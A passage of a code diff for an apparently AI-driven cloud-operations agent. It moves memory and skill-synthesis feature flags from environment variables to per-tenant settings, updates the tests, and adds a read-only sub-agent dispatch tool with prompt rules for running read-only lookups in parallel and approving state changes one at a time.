-        if (proceduralMemoryEnabled()) {
+        if (proceduralMemoryEnabled(tenantId)) {
             try {
                 const rules = await getMemoryService().recall({
                     tenantId, userId, query, kinds: ["PROCEDURAL"], limit: PROCEDURE_RECALL_LIMIT,
@@ -129,7 +129,7 @@ Return only the relevant memories.`
 
         // ── Episodic few-shot replay — distance-gated, no LLM filter ────────
         let episodesSection = "";
-        if (episodicMemoryEnabled()) {
+        if (episodicMemoryEnabled(tenantId)) {
             try {
                 const eps = await getMemoryService().recall({
                     tenantId, userId, query, kinds: ["EPISODIC"], limit: EPISODE_RECALL_LIMIT,
@@ -209,7 +209,7 @@ export function createMemorySaveNode(deps: MemoryNodeDeps) {
   Examples: how a scaling issue was resolved, successful deployment patterns
 - Error resolutions → namespace: ["errors", "<service-type>"]
   Examples: how an OOM was fixed, what caused a timeout, permission error workarounds
-` + (proceduralMemoryEnabled() ? `- Operating rules → add "kind": "PROCEDURAL", namespace: ["procedures", "<domain>"]
+` + (proceduralMemoryEnabled(tenantId) ? `- Operating rules → add "kind": "PROCEDURAL", namespace: ["procedures", "<domain>"]
   A rule for HOW the agent should behave in this environment, learned from this run.
   Extract a rule ONLY from a correction, a failure the run recovered from, or an explicit user preference about behavior.
   Shape: { "kind": "PROCEDURAL", "namespace": ["procedures", "aws-cli"], "key": "paginate-list-calls", "value": { "instruction": "Always paginate list/describe calls", "trigger": "any AWS CLI list operation", "evidence": "run truncated results and missed the target resource", "confidence": "high" } }
@@ -274,7 +274,7 @@ Extract memories to save.`
                 return { memoryStats: { phase: 'save', savedFacts: 0, savedRules: 0, episodeCaptured: false } };
             }
 
-            if (reconcileEnabled()) {
+            if (reconcileEnabled(tenantId)) {
                 console.log(`🧠 [MEMORY SAVE] Reconciling ${toSave.length} extracted facts...`);
                 const threadId = runtimeConfig?.configurable?.thread_id as string | undefined;
                 const summary = await reconcileMemories({
@@ -321,7 +321,7 @@ Extract memories to save.`
         // ── Episodic capture — independent of fact extraction; never blocks END ──
         const { plan, toolResults, errors, reflection, isComplete, iterationCount } = state;
         const threadIdForEpisode = runtimeConfig?.configurable?.thread_id as string | undefined;
-        const shouldCapture = episodicMemoryEnabled() && !!threadIdForEpisode && toolResults.length > 0;
+        const shouldCapture = episodicMemoryEnabled(tenantId) && !!threadIdForEpisode && toolResults.length > 0;
         if (shouldCapture) {
             await captureEpisode({
                 tenantId, userId, threadId: threadIdForEpisode,
@@ -331,7 +331,7 @@ Extract memories to save.`
         }
 
         // Autonomous skill synthesis — matured domains become/refresh enabled system skills (full Hermes).
-        if (proceduralMemoryEnabled()) {
+        if (proceduralMemoryEnabled(tenantId)) {
             await synthesizeDomainSkills({ tenantId, threadId: threadIdForEpisode, distillerModel: reflectorModel });
         }
 

--- a/apps/web-ui/lib/agent/memory/episode.test.ts
+++ b/apps/web-ui/lib/agent/memory/episode.test.ts
@@ -35,13 +35,13 @@ beforeEach(() => {
     mockSvc.remember.mockResolvedValue('ep-row-id');
     vi.mocked(getMemoryService).mockReturnValue(mockSvc as any);
 });
-afterEach(() => { delete process.env.EPISODIC_MEMORY_ENABLED; });
+import { DEFAULT_FEATURES, primeAiopsFeaturesCache } from '../aiops-features';
 
 describe('episodicMemoryEnabled', () => {
-    it('defaults true; false/0 disable', () => {
+    it('defaults true; tenant setting false disables', () => {
         expect(episodicMemoryEnabled()).toBe(true);
-        process.env.EPISODIC_MEMORY_ENABLED = 'false';
-        expect(episodicMemoryEnabled()).toBe(false);
+        primeAiopsFeaturesCache('t-epi-off', { ...DEFAULT_FEATURES, episodicMemoryEnabled: false });
+        expect(episodicMemoryEnabled('t-epi-off')).toBe(false);
     });
 });
 
@@ -76,9 +76,10 @@ describe('captureEpisode', () => {
     });
 
     it('flag off → short-circuits before invoking the distiller', async () => {
-        process.env.EPISODIC_MEMORY_ENABLED = 'false';
+        primeAiopsFeaturesCache('t1', { ...DEFAULT_FEATURES, episodicMemoryEnabled: false });
         const distiller = distillerReturning(JSON.stringify(goodEpisode));
         const saved = await captureEpisode(baseParams({ distillerModel: distiller }) as any);
+        primeAiopsFeaturesCache('t1', { ...DEFAULT_FEATURES });
         expect(saved).toBe(false);
         expect(distiller.invoke).not.toHaveBeenCalled();
     });

--- a/apps/web-ui/lib/agent/memory/episode.ts
+++ b/apps/web-ui/lib/agent/memory/episode.ts
@@ -16,15 +16,16 @@ import { contentToText } from '../agent-shared';
 import { getMemoryService } from './memory-service';
 import { compressToolOutput } from './working-memory';
 import type { EpisodicValue } from './types';
+import { getAiopsFeatures } from '../aiops-features';
 
 export const EPISODE_RECALL_LIMIT = 2;
 // Looser than reconcile's 0.55 — an ANALOGOUS past experience is useful even
 // when not near-identical. Initial guess — tune from recall logs.
 export const EPISODE_DISTANCE_THRESHOLD = 0.65;
 
-export function episodicMemoryEnabled(): boolean {
-    const v = process.env.EPISODIC_MEMORY_ENABLED?.toLowerCase();
-    return !(v === 'false' || v === '0');
+export function episodicMemoryEnabled(tenantId?: string): boolean {
+    // Tenant setting (AI Ops console -> settings), default on. No env dependency.
+    return getAiopsFeatures(tenantId).episodicMemoryEnabled;
 }
 
 export interface CaptureEpisodeParams {
@@ -57,7 +58,7 @@ If the run was routine or unremarkable (simple lookups, trivial queries), return
 );
 
 export async function captureEpisode(p: CaptureEpisodeParams): Promise<boolean> {
-    if (!episodicMemoryEnabled()) return false;
+    if (!episodicMemoryEnabled(p.tenantId)) return false;
     try {
         const toolSummary = p.toolResults
             .map((t) => `- ${t.toolName} [${t.isError ? 'ERROR' : 'OK'}]: ${compressToolOutput(t.output, 400)}`)

--- a/apps/web-ui/lib/agent/memory/procedural.test.ts
+++ b/apps/web-ui/lib/agent/memory/procedural.test.ts
@@ -4,13 +4,13 @@ import {
     PROCEDURE_RECALL_LIMIT, PROCEDURE_DISTANCE_THRESHOLD,
 } from './procedural';
 
-afterEach(() => { delete process.env.PROCEDURAL_MEMORY_ENABLED; });
+import { DEFAULT_FEATURES, primeAiopsFeaturesCache } from '../aiops-features';
 
 describe('proceduralMemoryEnabled', () => {
-    it('defaults true; false/0 disable', () => {
+    it('defaults true; tenant setting false disables', () => {
         expect(proceduralMemoryEnabled()).toBe(true);
-        process.env.PROCEDURAL_MEMORY_ENABLED = 'false';
-        expect(proceduralMemoryEnabled()).toBe(false);
+        primeAiopsFeaturesCache('t-proc-off', { ...DEFAULT_FEATURES, proceduralMemoryEnabled: false });
+        expect(proceduralMemoryEnabled('t-proc-off')).toBe(false);
     });
 });
 

--- a/apps/web-ui/lib/agent/memory/procedural.ts
+++ b/apps/web-ui/lib/agent/memory/procedural.ts
@@ -7,14 +7,15 @@
  */
 
 import type { ProceduralValue } from './types';
+import { getAiopsFeatures } from '../aiops-features';
 
 export const PROCEDURE_RECALL_LIMIT = 3;
 // Shared value with EPISODE_DISTANCE_THRESHOLD — one knob until logs say otherwise.
 export const PROCEDURE_DISTANCE_THRESHOLD = 0.65;
 
-export function proceduralMemoryEnabled(): boolean {
-    const v = process.env.PROCEDURAL_MEMORY_ENABLED?.toLowerCase();
-    return !(v === 'false' || v === '0');
+export function proceduralMemoryEnabled(tenantId?: string): boolean {
+    // Tenant setting (AI Ops console -> settings), default on. No env dependency.
+    return getAiopsFeatures(tenantId).proceduralMemoryEnabled;
 }
 
 function isNonEmptyString(v: unknown): v is string {

--- a/apps/web-ui/lib/agent/memory/reconcile.test.ts
+++ b/apps/web-ui/lib/agent/memory/reconcile.test.ts
@@ -35,13 +35,13 @@ beforeEach(() => {
     mockSvc.reinforce.mockResolvedValue(undefined);
     vi.mocked(getMemoryService).mockReturnValue(mockSvc as any);
 });
-afterEach(() => { delete process.env.MEMORY_RECONCILE_ENABLED; });
+import { DEFAULT_FEATURES, primeAiopsFeaturesCache } from '../aiops-features';
 
 describe('reconcileEnabled', () => {
-    it('defaults true; false/0 disable', () => {
+    it('defaults true; tenant setting false disables', () => {
         expect(reconcileEnabled()).toBe(true);
-        process.env.MEMORY_RECONCILE_ENABLED = 'false';
-        expect(reconcileEnabled()).toBe(false);
+        primeAiopsFeaturesCache('t-rec-off', { ...DEFAULT_FEATURES, memoryReconcileEnabled: false });
+        expect(reconcileEnabled('t-rec-off')).toBe(false);
     });
 });
 

--- a/apps/web-ui/lib/agent/memory/reconcile.ts
+++ b/apps/web-ui/lib/agent/memory/reconcile.ts
@@ -12,15 +12,16 @@ import type { BaseChatModel } from '@langchain/core/language_models/chat_models'
 import { contentToText } from '../agent-shared';
 import { getMemoryService } from './memory-service';
 import type { ExtractedFact, MemoryHit, ReconcileDecision, ReconcileSummary } from './types';
+import { getAiopsFeatures } from '../aiops-features';
 
 export const RECONCILE_TOP_K = 5;
 // Cosine distance (0 = identical). Neighbors farther than this are treated as
 // unrelated and the fact goes straight to ADD. Initial guess — tune from logs.
 export const RECONCILE_DISTANCE_THRESHOLD = 0.55;
 
-export function reconcileEnabled(): boolean {
-    const v = process.env.MEMORY_RECONCILE_ENABLED?.toLowerCase();
-    return !(v === 'false' || v === '0');
+export function reconcileEnabled(tenantId?: string): boolean {
+    // Tenant setting (AI Ops console -> settings), default on. No env dependency.
+    return getAiopsFeatures(tenantId).memoryReconcileEnabled;
 }
 
 interface FactWithNeighbors {

--- a/apps/web-ui/lib/agent/memory/skill-synthesis.test.ts
+++ b/apps/web-ui/lib/agent/memory/skill-synthesis.test.ts
@@ -10,6 +10,7 @@ import { getMemoryService } from './memory-service';
 import {
     synthesizeDomainSkills, autoSkillCreationEnabled, autoSkillMaturityThreshold, skillSynthesisMinRules,
 } from './skill-synthesis';
+import { DEFAULT_FEATURES, primeAiopsFeaturesCache } from '../aiops-features';
 
 const mockRepo = { getBySlug: vi.fn(), create: vi.fn(), update: vi.fn() };
 const mockSvc = { update: vi.fn() };
@@ -57,12 +58,12 @@ afterEach(() => {
 });
 
 describe('flags', () => {
-    it('defaults + env overrides', () => {
+    it('defaults + tenant-setting overrides', () => {
         expect(autoSkillCreationEnabled()).toBe(true);
         expect(autoSkillMaturityThreshold()).toBe(3);
         expect(skillSynthesisMinRules()).toBe(3);
-        process.env.SKILL_SYNTHESIS_MIN_RULES = '5';
-        expect(skillSynthesisMinRules()).toBe(5);
+        primeAiopsFeaturesCache('t-syn', { ...DEFAULT_FEATURES, skillSynthesisMinRules: 5 });
+        expect(skillSynthesisMinRules('t-syn')).toBe(5);
     });
 });
 
@@ -147,8 +148,9 @@ describe('synthesizeDomainSkills', () => {
     });
 
     it('flag off → 0 without any query', async () => {
-        process.env.AUTO_SKILL_CREATION_ENABLED = 'false';
+        primeAiopsFeaturesCache('t1', { ...DEFAULT_FEATURES, autoSkillCreationEnabled: false });
         const n = await synthesizeDomainSkills({ ...base, distillerModel: distillerReturning(goodDistill) });
+        primeAiopsFeaturesCache('t1', { ...DEFAULT_FEATURES });
         expect(n).toBe(0);
         expect(mockQueryRaw).not.toHaveBeenCalled();
     });

--- a/apps/web-ui/lib/agent/memory/skill-synthesis.ts
+++ b/apps/web-ui/lib/agent/memory/skill-synthesis.ts
@@ -16,20 +16,19 @@ import { contentToText } from '../agent-shared';
 import { getPrismaClient } from '@/lib/db/pg-config';
 import { getSkillRepository } from '@/lib/db/repository-factory';
 import { getMemoryService } from './memory-service';
+import { getAiopsFeatures } from '../aiops-features';
 
-export function autoSkillCreationEnabled(): boolean {
-    const v = process.env.AUTO_SKILL_CREATION_ENABLED?.toLowerCase();
-    return !(v === 'false' || v === '0');
+export function autoSkillCreationEnabled(tenantId?: string): boolean {
+    // Tenant setting (AI Ops console -> settings), default on. No env dependency.
+    return getAiopsFeatures(tenantId).autoSkillCreationEnabled;
 }
 
-export function autoSkillMaturityThreshold(): number {
-    const n = Number(process.env.AUTO_SKILL_MATURITY_THRESHOLD);
-    return Number.isFinite(n) && n > 0 ? n : 3;
+export function autoSkillMaturityThreshold(tenantId?: string): number {
+    return getAiopsFeatures(tenantId).autoSkillMaturityThreshold;
 }
 
-export function skillSynthesisMinRules(): number {
-    const n = Number(process.env.SKILL_SYNTHESIS_MIN_RULES);
-    return Number.isFinite(n) && n > 0 ? n : 3;
+export function skillSynthesisMinRules(tenantId?: string): number {
+    return getAiopsFeatures(tenantId).skillSynthesisMinRules;
 }
 
 const MAX_EPISODES = 3;
@@ -62,11 +61,11 @@ export async function synthesizeDomainSkills(params: {
     threadId?: string;
     distillerModel: BaseChatModel;
 }): Promise<number> {
-    if (!autoSkillCreationEnabled()) return 0;
+    if (!autoSkillCreationEnabled(params.tenantId)) return 0;
     try {
         const prisma = getPrismaClient();
-        const threshold = autoSkillMaturityThreshold();
-        const minRules = skillSynthesisMinRules();
+        const threshold = autoSkillMaturityThreshold(params.tenantId);
+        const minRules = skillSynthesisMinRules(params.tenantId);
 
         // 1. Best candidate domain (tenant-bound; bare `procedures` namespaces excluded).
         const candidates = await prisma.$queryRaw<Array<{ domain: string; matured: number; pending: number }>>`

--- a/apps/web-ui/lib/agent/memory/working-memory.test.ts
+++ b/apps/web-ui/lib/agent/memory/working-memory.test.ts
@@ -1,12 +1,12 @@
 import { describe, it, expect, beforeEach, afterEach } from 'vitest';
 import { workingMemoryEnabled, tokenBudget, keepRecent } from './working-memory';
+import { DEFAULT_FEATURES, primeAiopsFeaturesCache } from '../aiops-features';
 
 describe('working-memory config', () => {
     const saved = { ...process.env };
     afterEach(() => { process.env = { ...saved }; });
 
     it('defaults: enabled=true, budget=60000, keep=8', () => {
-        delete process.env.WORKING_MEMORY_ENABLED;
         delete process.env.WORKING_MEMORY_TOKEN_BUDGET;
         delete process.env.WORKING_MEMORY_KEEP_RECENT;
         expect(workingMemoryEnabled()).toBe(true);
@@ -14,9 +14,9 @@ describe('working-memory config', () => {
         expect(keepRecent()).toBe(8);
     });
 
-    it('WORKING_MEMORY_ENABLED=false disables', () => {
-        process.env.WORKING_MEMORY_ENABLED = 'false';
-        expect(workingMemoryEnabled()).toBe(false);
+    it('tenant setting false disables', () => {
+        primeAiopsFeaturesCache('t-wm-off', { ...DEFAULT_FEATURES, workingMemoryEnabled: false });
+        expect(workingMemoryEnabled('t-wm-off')).toBe(false);
     });
 
     it('reads numeric overrides', () => {
@@ -141,7 +141,7 @@ describe('prepareContext', () => {
     afterEach(() => { delete process.env.WORKING_MEMORY_ENABLED; delete process.env.WORKING_MEMORY_TOKEN_BUDGET; });
 
     it('disabled → falls back to getRecentMessages(fallbackWindow), no WM section, no LLM call', async () => {
-        process.env.WORKING_MEMORY_ENABLED = 'false';
+        primeAiopsFeaturesCache('t-wm-flow', { ...DEFAULT_FEATURES, workingMemoryEnabled: false });
         // Alternate roles so getRecentMessages passes the window through unchanged
         // (adjacent same-role messages make it inject synthetic "Acknowledged." AIMessages,
         // which would push the returned length above the fallbackWindow — a getRecentMessages
@@ -149,7 +149,7 @@ describe('prepareContext', () => {
         const msgs = Array.from({ length: 30 }, (_, i) =>
             i % 2 === 0 ? new HumanMessage(`m${i}`) : new AIMessage(`m${i}`),
         );
-        const res = await prepareContext(baseState(msgs), { reflectorModel: fakeReflector }, 20);
+        const res = await prepareContext(baseState(msgs), { reflectorModel: fakeReflector, tenantId: 't-wm-flow' }, 20);
         expect(res.workingMemorySection).toBe('');
         expect(res.stateUpdate).toEqual({});
         // Disabled path returns EXACTLY the legacy getRecentMessages(fallbackWindow) window

--- a/apps/web-ui/lib/agent/memory/working-memory.ts
+++ b/apps/web-ui/lib/agent/memory/working-memory.ts
@@ -5,13 +5,14 @@ import { getRecentMessages, contentToText } from '../agent-shared';
 import type { ReflectionState } from '../agent-shared';
 import type { Scratchpad, WorkingMemory } from './types';
 import { getMemoryService } from './memory-service';
+import { getAiopsFeatures } from '../aiops-features';
 
 // Working-memory configuration. Read process.env directly (not the typed `env`
 // object) so Vitest can mutate values per-test — env.ts skips validation under
 // NODE_ENV==='test' but caches at import time.
-export function workingMemoryEnabled(): boolean {
-    const v = process.env.WORKING_MEMORY_ENABLED?.toLowerCase();
-    return !(v === 'false' || v === '0');
+export function workingMemoryEnabled(tenantId?: string): boolean {
+    // Tenant setting (AI Ops console -> settings), default on. No env dependency.
+    return getAiopsFeatures(tenantId).workingMemoryEnabled;
 }
 
 // Legacy default when neither an env override nor a model-derived budget is available.
@@ -179,7 +180,7 @@ export async function prepareContext(
     const { messages } = state;
 
     // Disabled → identical to legacy behavior.
-    if (!workingMemoryEnabled()) {
+    if (!workingMemoryEnabled(deps.tenantId)) {
         return {
             windowMessages: getRecentMessages(messages, fallbackWindow),
             workingMemorySection: '',

--- a/apps/web-ui/lib/agent/model-factory.ts
+++ b/apps/web-ui/lib/agent/model-factory.ts
@@ -196,6 +196,8 @@ export interface AssembleToolsOptions {
     accounts?: AccountContext[];
     /** Knowledge base ids to default-scope the search_knowledge_base tool to. Omit/null to search tenant-wide. */
     knowledgeBaseIds?: string[] | null;
+    /** When set, adds the dispatch_agent fan-out tool built from these deps. */
+    dispatchAgentTool?: unknown;
 }
 
 /**
@@ -268,6 +270,7 @@ export async function assembleTools(options: AssembleToolsOptions = {}) {
         createListAwsAccountsTool(effectiveTenantId),
         createGetRightSizingRecommendationsTool(effectiveTenantId),
         askUserTool,
+        ...(options.dispatchAgentTool ? [options.dispatchAgentTool as never] : []),
         ...(includeS3Tools ? [writeFileToS3Tool, getFileFromS3Tool] : []),
         ...memoryTools,
         ...kbTools,

--- a/apps/web-ui/lib/agent/planning-agent.ts
+++ b/apps/web-ui/lib/agent/planning-agent.ts
@@ -290,7 +290,7 @@ Work through three phases when building the plan:
 
 - The plan is INTERNAL COORDINATION. The user sees it in a progress rail — it is never part of the answer, so optimize it for execution, not for presentation.
 - Match plan depth to the request. A simple lookup or single-command request needs only 1–2 steps (credentials + the query); a conversational or no-tool request gets exactly one step: ["Answer the user's request directly"]. Only genuinely multi-phase investigations warrant 5+ steps.
-- Keep the plan SHORT: never more than 7 steps. Merge related read-only queries into a single step (e.g., one step for "inventory EC2 + RDS + EBS across regions", not one step per service per region).
+- Keep the plan SHORT: never more than 7 steps. Merge related read-only queries into a single step (e.g., one step for "inventory EC2 + RDS + EBS across regions", not one step per service per region). The executor issues the individual queries in that step as parallel tool calls, so a merged step costs no more time than a narrow one.
 - Every step except the last must be a concrete tool action. Do NOT create steps for aggregating, analyzing, summarizing, cross-referencing, or "evaluating" data — that thinking happens inside execution, not as plan line items.
 - Do NOT add a knowledge-base search step unless the user asked for it or the task clearly depends on tenant-specific documented context.
 - The LAST step is always: compose the final answer to the user's request from the gathered data.
@@ -404,7 +404,10 @@ ${accountContext}
 
 ## Execution Discipline
 
-- Execute exactly the current step — do not skip ahead or bundle future steps into a single call.
+- Execute the current step. When that step covers several INDEPENDENT read-only lookups (different accounts, regions, or services), issue them as MULTIPLE tool calls in this single turn — they run in parallel. One call per turn for independent reads wastes minutes.
+- Calls that DEPEND on each other must stay sequential: if call B needs call A's output (an account id, a resource id, a profile name), make call A now and call B on the next turn.
+- Never batch mutations. Issue at most ONE state-changing call per turn so each is reviewed and approved individually.
+- Do not skip ahead to later plan steps.
 - If a tool call returns an error, capture the full error message and diagnose it; do not silently suppress it.
 - If the current step is a simple question or greeting that requires no tools, answer directly and concisely.
 - If the current step has nothing to execute (empty inventory, prerequisite returned no data), move on silently — NEVER run echo or other no-op commands just to mark a step done, and never write an explanation of why there was nothing to do.
@@ -764,6 +767,7 @@ Issues to Address: ${errors.join(', ') || 'None'}
 6. For errors returned by tools: diagnose the root cause (permissions, resource not found, wrong region, wrong account) and fix the underlying issue rather than retrying the same command unchanged.
 7. Do not repeat actions that the reviewer marked as correctly completed — focus only on the open issues.
 8. After fixing all issues, provide a brief summary of what was corrected and what the result now shows.
+9. When the fix requires several independent read-only re-checks, issue them as multiple tool calls in this single turn rather than one per turn.
 ${accountContext}`);
 
         const recentMessages = windowMessages;

--- a/apps/web-ui/lib/agent/planning-agent.ts
+++ b/apps/web-ui/lib/agent/planning-agent.ts
@@ -37,6 +37,7 @@ import { prepareContext, buildWorkingMemorySection, estimateTokens } from "./mem
 import { createGuardNode } from "./guard";
 import { routeAfterGuard } from "./gate-routing";
 import { recordNodeTiming } from "./run-timings";
+import { getAiopsFeatures, resolveAiopsFeatures } from "./aiops-features";
 import { resolveSubagentBudget } from "./subagent-budget";
 import { createRunBudgetLedger, createDispatchAgentTool } from "./dispatch-agent-tool";
 import { filterReadOnlyTools } from "./subagent";
@@ -199,7 +200,9 @@ export async function createReflectionGraph(config: GraphConfig) {
     // Pre-fetch skill content once (tenant-scoped DB lookup). No repeated queries.
     const skillContent = selectedSkill && tenantId ? (await getSkillContent(tenantId, selectedSkill)) || '' : '';
     if (selectedSkill) {
-        console.log(skillContent ? `[PlanningAgent] Loaded skill: ${selectedSkill}` : `[PlanningAgent] No content for skill: ${selectedSkill}`);
+        // The char count is the observable proof of injection: this exact string is
+        // concatenated into the system prompt below. (LLM_AUDIT=true dumps it verbatim.)
+        console.log(skillContent ? `[PlanningAgent] Loaded skill: ${selectedSkill} (${skillContent.length.toLocaleString()} chars injected into system prompt)` : `[PlanningAgent] No content for skill: ${selectedSkill}`);
     }
 
     // Skill catalog for progressive disclosure — gated by the console "Auto
@@ -235,6 +238,12 @@ export async function createReflectionGraph(config: GraphConfig) {
     const subagentBudget = tenantId
         ? await resolveSubagentBudget(tenantId)
         : { enabled: false, maxConcurrentSubagents: 1, maxSubagentsPerRun: 1, maxSubagentTokensPerRun: 0, subagentMaxIterations: 2, subagentTimeoutMs: 30_000 };
+
+    // Tenant-tunable run cap (AI Ops console settings). Resolved once per graph
+    // build; MAX_ITERATIONS from agent-shared remains only as the default.
+    const maxIterations = tenantId
+        ? (await resolveAiopsFeatures(tenantId).catch(() => getAiopsFeatures(tenantId))).maxIterations
+        : MAX_ITERATIONS;
 
     const dispatchAgentTool = subagentBudget.enabled
         ? createDispatchAgentTool({
@@ -319,7 +328,8 @@ Work through three phases when building the plan:
 
 - The plan is INTERNAL COORDINATION. The user sees it in a progress rail — it is never part of the answer, so optimize it for execution, not for presentation.
 - Match plan depth to the request. A simple lookup or single-command request needs only 1–2 steps (credentials + the query); a conversational or no-tool request gets exactly one step: ["Answer the user's request directly"]. Only genuinely multi-phase investigations warrant 5+ steps.
-- Keep the plan SHORT: never more than 7 steps. Merge related read-only queries into a single step (e.g., one step for "inventory EC2 + RDS + EBS across regions", not one step per service per region). The executor issues the individual queries in that step as parallel tool calls, so a merged step costs no more time than a narrow one.
+- Keep the plan SHORT: never more than 7 steps. Merge related read-only queries into a single step (e.g., one step for "inventory EC2 + RDS + EBS across regions", not one step per service per region). The executor issues the individual queries in that step as parallel tool calls, so a merged step costs no more time than a narrow one.${subagentBudget.enabled ? `
+- The executor can DELEGATE via dispatch_agent: parallel read-only sub-agents, each investigating one account/region/service in its own context and returning a compressed report. When the task fans out into per-account (or per-region/per-service) investigations that each need multiple steps (e.g. list resources, then fetch metrics per resource), write ONE plan step shaped for delegation — "Dispatch one sub-agent per account to investigate X and report Y" — instead of merging that fan-out into a direct-query step. Delegation keeps the main context small; use it whenever the fan-out exceeds ~3 independent multi-step investigations.` : ''}
 - Every step except the last must be a concrete tool action. Do NOT create steps for aggregating, analyzing, summarizing, cross-referencing, or "evaluating" data — that thinking happens inside execution, not as plan line items.
 - Do NOT add a knowledge-base search step unless the user asked for it or the task clearly depends on tenant-specific documented context.
 - The LAST step is always: compose the final answer to the user's request from the gathered data.
@@ -401,7 +411,7 @@ Only return the JSON array, nothing else.`);
         const { messages, plan, iterationCount, memoryContext } = state;
 
         console.log(`\n================================================================================`);
-        console.log(`⚡ [EXECUTOR] Iteration ${iterationCount + 1}/${MAX_ITERATIONS}`);
+        console.log(`⚡ [EXECUTOR] Iteration ${iterationCount + 1}/${maxIterations}`);
         console.log(`   Current Step: ${plan.find(s => s.status === 'pending')?.step || 'Executing...'}`);
         console.log(`   Model: ${modelId}`);
         console.log(`================================================================================\n`);
@@ -433,7 +443,7 @@ ${accountContext}
 
 ## Execution Discipline
 
-- Execute the current step. When that step covers several INDEPENDENT read-only lookups (different accounts, regions, or services), issue them as MULTIPLE tool calls in this single turn — they run in parallel. One call per turn for independent reads wastes minutes.
+- Execute the current step. When that step is a handful of INDEPENDENT single-call lookups (each unit = ONE tool call, e.g. get_aws_credentials for several accounts), issue them as MULTIPLE tool calls in this single turn — they run in parallel. One call per turn for independent reads wastes minutes.${dispatchAgentTool ? ' When each unit instead needs its own multi-step investigation, delegate it — see Delegation below; do not flatten a fan-out of investigations into direct calls.' : ''}
 - Calls that DEPEND on each other must stay sequential: if call B needs call A's output (an account id, a resource id, a profile name), make call A now and call B on the next turn.
 - Never batch mutations. Issue at most ONE state-changing call per turn so each is reviewed and approved individually.
 - Do not skip ahead to later plan steps.
@@ -441,12 +451,16 @@ ${accountContext}
 - If the current step is a simple question or greeting that requires no tools, answer directly and concisely.
 - If the current step has nothing to execute (empty inventory, prerequisite returned no data), move on silently — NEVER run echo or other no-op commands just to mark a step done, and never write an explanation of why there was nothing to do.
 
-## Delegation
+${dispatchAgentTool ? `## Delegation
 
-- When the current step splits into INDEPENDENT investigations — one per account, region, or service — emit several dispatch_agent calls in THIS turn. They run in parallel and each returns a compressed report.
+- DELEGATE (dispatch_agent) when the current step splits into INDEPENDENT investigations — one per account, region, or service — where each unit needs SEVERAL tool calls of its own (list resources, then fetch metrics/details per resource). Emit several dispatch_agent calls in THIS turn; they run in parallel and each returns a compressed report. BATCH direct tool calls instead only when each unit is a single call.
 - Write each sub-agent brief so it stands completely alone: it sees none of this conversation, so spell out account ids, regions, time windows, and what the report must contain.
+- Sub-agents have NO shell. Never put CLI command lines, --profile flags, or shell syntax like $(date ...) in a brief. Describe goals plus aws_read service/operations (e.g. "ec2 describe-instances, then cloudwatch get-metric-statistics for CPUUtilization"); the sub-agent obtains its own credentials from the account id you give it.
+- Give every sub-agent a DISTINCT role naming its account/region/service — identical role strings make the progress cards indistinguishable.
 - Do NOT delegate work that changes state — sub-agents are read-only. Do NOT delegate a single quick lookup. Do NOT chain sub-agents; they cannot see each other's results.
-- If dispatch_agent replies that the budget is exhausted, simply do that work yourself with your own tools.
+- If dispatch_agent replies that the budget is exhausted, simply do that work yourself with your own tools.` : `## Delegation
+
+- Sub-agents are DISABLED for this organization. There is no dispatch_agent tool — never reference or attempt it. Do all work yourself with your own tools, batching independent read-only calls into a single turn.`}
 
 ## Narration Discipline (critical)
 
@@ -582,7 +596,7 @@ The user sees plan progress in a UI rail — your prose must NEVER duplicate it:
 
         console.log(`\n================================================================================`);
         console.log(`🤔 [REFLECTOR] Analyzing execution results`);
-        console.log(`   Iteration: ${iterationCount}/${MAX_ITERATIONS}`);
+        console.log(`   Iteration: ${iterationCount}/${maxIterations}`);
         console.log(`   Model: ${modelId}`);
         console.log(`================================================================================`);
 
@@ -608,7 +622,7 @@ Original Task: ${taskDescription}
 Plan Status:
 ${plan.map((s, i) => `${i + 1}. [${s.status}] ${s.step}`).join('\n')}
 
-Iteration: ${iterationCount}/${MAX_ITERATIONS}
+Iteration: ${iterationCount}/${maxIterations}
 
 ## Input Notes
 
@@ -744,7 +758,7 @@ ${suggestions !== "None" ? `💡 **Suggestions:** ${suggestions}` : ""}
 
 **Task Complete:** ${isComplete ? "✅ Yes" : "❌ No, continuing..."}`;
 
-        if (iterationCount >= MAX_ITERATIONS && !isComplete) {
+        if (iterationCount >= maxIterations && !isComplete) {
             console.log(`⚠️ Max iterations (${MAX_ITERATIONS}) reached. Forcing completion.`);
             isComplete = true;
         }

--- a/apps/web-ui/lib/agent/planning-agent.ts
+++ b/apps/web-ui/lib/agent/planning-agent.ts
@@ -36,6 +36,7 @@ import { createMemoryRecallNode, createMemorySaveNode } from "./memory-nodes";
 import { prepareContext, buildWorkingMemorySection, estimateTokens } from "./memory/working-memory";
 import { createGuardNode } from "./guard";
 import { routeAfterGuard } from "./gate-routing";
+import { recordNodeTiming } from "./run-timings";
 
 const PLAN_STATUSES = new Set<PlanStep['status']>(['completed', 'in_progress', 'pending', 'failed']);
 
@@ -253,7 +254,7 @@ export async function createReflectionGraph(config: GraphConfig) {
     // ---------------------------------------------------------------------------
     // PLANNER NODE
     // ---------------------------------------------------------------------------
-    async function planNode(state: ReflectionState): Promise<Partial<ReflectionState>> {
+    async function planNode(state: ReflectionState, runtimeConfig?: any): Promise<Partial<ReflectionState>> {
         const { messages, memoryContext } = state;
         const workingMemorySection = buildWorkingMemorySection(
             state.runningSummary || (state.scratchpad?.openGoals?.length ?? 0) > 0
@@ -313,6 +314,8 @@ Only return the JSON array, nothing else.`);
         try {
             response = await model.invoke(_auditInputs_plan) as AIMessage;
             llmAuditLog('PLANNER', _auditInputs_plan, response, _auditStart_plan);
+            recordNodeTiming(runtimeConfig?.configurable?.thread_id, 'PLANNER', Date.now() - _auditStart_plan,
+                (response as any).usage_metadata?.input_tokens ?? 0, (response as any).usage_metadata?.output_tokens ?? 0);
         } catch (err: any) {
             // A provider hiccup while planning must not abort the run — fall back to a
             // trivial single-step plan (the empty content flows through the parse fallback below).
@@ -430,6 +433,8 @@ The user sees plan progress in a UI rail — your prose must NEVER duplicate it:
         try {
             response = await modelWithTools.invoke(_auditInputs_exec) as AIMessage;
             llmAuditLog('EXECUTOR', _auditInputs_exec, response, _auditStart_exec);
+            recordNodeTiming(runtimeConfig?.configurable?.thread_id, 'EXECUTOR', Date.now() - _auditStart_exec,
+                (response as any).usage_metadata?.input_tokens ?? 0, (response as any).usage_metadata?.output_tokens ?? 0);
         } catch (err: any) {
             // Provider error mid-step: don't crash the run. Emit a text note (no tool calls)
             // so the graph routes on to reflection/finalization with whatever was gathered.
@@ -533,7 +538,7 @@ The user sees plan progress in a UI rail — your prose must NEVER duplicate it:
     // ---------------------------------------------------------------------------
     // REFLECTOR NODE
     // ---------------------------------------------------------------------------
